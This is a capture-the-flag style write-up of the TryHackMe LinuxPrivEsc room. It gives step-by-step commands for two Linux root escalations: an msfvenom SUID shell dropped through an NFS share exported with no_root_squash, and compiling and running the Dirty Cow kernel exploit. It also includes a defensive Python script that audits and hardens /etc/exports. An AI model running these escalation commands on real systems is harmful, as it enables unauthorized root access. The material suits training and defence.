Introduction

We covered Linux privilege escalation through enumerating NFS shares and using kernel exploits as part of the LinuxPrivEsc room from TryHackMe.

Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the “nobody” user.

Kernel exploits can leave the system in an unstable state, which is why you should only run them as a last resort.

Exploiting NFS (Network File System)

First up, I’ll tackle an NFS share. After logging into the target machine, my goal is to escalate my privileges.

  1. Enumeration: I start by checking the NFS configuration, which is usually found in the /etc/exports file. In this case, I find a share located at /temp with read/write permissions and, most importantly, the no_root_squash option enabled.
  2. Understanding no_root_squash: This is a critical misconfiguration. It means that if I access the share as the root user from my machine, my user ID won’t be “squashed” or demoted to a low-privilege user. I’ll remain root on the remote share, which is a huge security risk.
  3. The Attack:
    • On my attacker machine, I create a local directory (e.g., /temp/nfs) and mount the target’s NFS share to it.
    • Next, I use msfvenom to generate a malicious payload. This payload is designed to give me a shell with root privileges. I save this payload directly into the mounted NFS directory.
    • Because no_root_squash is active, this payload now sits on the target system with root ownership. I make the payload executable and add the setuid permission. This special permission allows any user who runs the file to do so with the owner’s privileges (in this case, root).
    • Finally, back on the target machine, I simply execute the payload. Voilà! I get a root shell.

For those looking to secure their systems, I also explain that simply removing the no_root_squash option from the /etc/exports file is the way to fix this vulnerability.
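As an added example (not part of the original walkthrough), here is a small Python audit that parses an /etc/exports file in the format shown above, flags every client entry that carries no_root_squash, and produces a hardened copy with root_squash in its place. The sample exports text is constructed for the demo.

```python
import re

# Constructed sample /etc/exports content (not taken from a real host).
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/temp     *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/data 10.0.0.0/24(ro,sync,root_squash)
/backup   10.0.0.5(rw,sync) 10.0.0.6(rw,no_root_squash)
"""

# Either "client(opt,opt)" or a bare client with no option list.
CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")


def parse_exports(text):
    """Return [(path, [(client, [options]), ...]), ...] for every non-comment line."""
    exports = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)  # path, then the client/option list
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else ""
        clients = []
        for m in CLIENT_RE.finditer(rest):
            if m.group(3):  # bare host: exportfs defaults apply (root_squash)
                clients.append((m.group(3), []))
            else:
                opts = [o.strip() for o in m.group(2).split(",") if o.strip()]
                clients.append((m.group(1), opts))
        exports.append((path, clients))
    return exports


def find_no_root_squash(text):
    """Return (path, client) pairs where a remote root keeps uid 0 on the share."""
    return [(path, client)
            for path, clients in parse_exports(text)
            for client, opts in clients
            if "no_root_squash" in opts]


def harden_exports(text):
    """Rewrite the exports text with every no_root_squash replaced by root_squash."""
    out = []
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            out.append(line)
            continue
        out.append(re.sub(r"\bno_root_squash\b", "root_squash", line))
    return "\n".join(out) + "\n"
```

After writing the hardened file back, the server still needs `exportfs -ra` for the change to take effect on live exports.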

Leveraging Kernel Exploits

Kernel exploits are powerful but can be risky. I generally save these as a last resort in a real-world penetration test because a bad exploit can crash the system.

  1. Finding Vulnerabilities:
    • The first step is to identify the kernel version. I can do this with commands like uname -a or by reading the /proc/version file.
    • With the version number, I can search for known exploits. For the kernel in this video, the infamous “Dirty Cow” exploit is a perfect match.
    • An even easier way is to use an automated script. I demonstrate how to run linux-exploit-suggester, a Perl script that checks the kernel version against a database of known vulnerabilities. As expected, it flags Dirty Cow among others.
  2. Execution:
    • I navigate to the directory containing the Dirty Cow exploit, which is a C file.
    • I compile the exploit code using gcc.
    • Running the compiled exploit modifies the /usr/bin/passwd binary in a way that lets me elevate my privileges to root.
    • Once I have root access, I show how to be a good guest and restore the original passwd binary from the backup the exploit created.

To wrap things up, I point out a few other useful privilege escalation scripts like linenum, linpeas, and lse.sh that are available in the tools directory.

Technical Commands

Here are the commands I used throughout the demonstration:

  • cat /etc/exports – To check the NFS share configuration.
  • sudo -i – To switch to the root user.
  • mkdir /temp/nfs – To create a directory for mounting the NFS share.
  • mount -o rw,vers=2 10.10.10.10:/temp /temp/nfs – To mount the remote NFS share (IP is an example).
  • ls -la – To list files and their permissions.
  • msfvenom -p linux/x86/exec CMD="/bin/bash -p" -b "\x00" -f elf -o /temp/nfs/shell.elf – To create the malicious payload.
  • chmod +x,+s /temp/nfs/shell.elf – To make the payload executable and set the SUID bit.
  • /temp/shell.elf – To execute the payload on the target.
  • id – To check the current user’s ID.
  • exit – To exit the shell.
  • rmdir /temp/nfs – To remove the mount directory.
  • uname -a – To check the kernel version.
  • cat /proc/version – Another way to check the kernel version.
  • perl linux-exploit-suggester.pl – To run the exploit suggestion script.
  • gcc -pthread dirty.c -o cow -lcrypt – To compile the Dirty Cow exploit.
  • ./cow – To run the compiled exploit.
  • mv /tmp/back /usr/bin/passwd – To restore the original passwd binary.
  • passwd – To interact with the (now modified) passwd utility.

TryHackMe Room Answers

What is the name of the option that disables root squashing?

 

Video Walkthrough


About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
